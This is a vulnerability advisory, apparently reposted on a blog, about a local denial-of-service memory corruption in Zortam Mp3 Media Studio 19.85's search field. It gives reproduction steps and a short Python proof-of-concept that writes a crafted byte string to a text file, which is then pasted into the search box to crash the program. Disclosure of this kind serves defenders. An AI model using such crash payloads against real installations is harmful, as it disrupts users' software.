Zortam Mp3 Media Studio 19.85 – Memory Corruption

A denial of service memory corruption vulnerability has been discovered in the official Zortam Mp3 Media Studio v19.85 software. This vulnerability is due to an invalid pointer corruption during search processing in the search engine. Which could be exploited by attackers to crash a complete software process via a denial of service.

Vulnerable Module(s):
[+] search (Input)

Product & Service Introduction:
===============================

Zortam MP3 Media Studio is a complete application for MP3 audio file manipulation. It contains an ID3 tag organizer for searching and cataloging MP3 files in the library. It allows to edit tags ID3v1 and ID3v2.4 with the ID3 tag editor. Finally, it includes a CD burning wizard that directly downloads CD covers and lyrics directly via the Internet using the CDDB (the CD database on the Internet).

(Copy of the Homepage: http://www.zortam.com/)

Date of Discovery:
==================

2015-12-05

Exploitation Technique:
=======================

Local

Platfom Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

restrict the number of characters in the search engine

Levels Risk :

Proof of Concept (PoC):
=======================

Manual steps to reproduce the vulnerability :
1. Launch Zortam.exe
2. Copy  the characters from Zartam.txt to clipboard
3. Paste it the input search 
4. Software will Crash

#!/usr/bin/python

Crash = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

PoC = Crash
  
try:
    file = open("Zortam.txt",'w')
    file.write(PoC)
    file.close()
    print "PoC Create By ZwX\n"
except:
    print "Error"

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*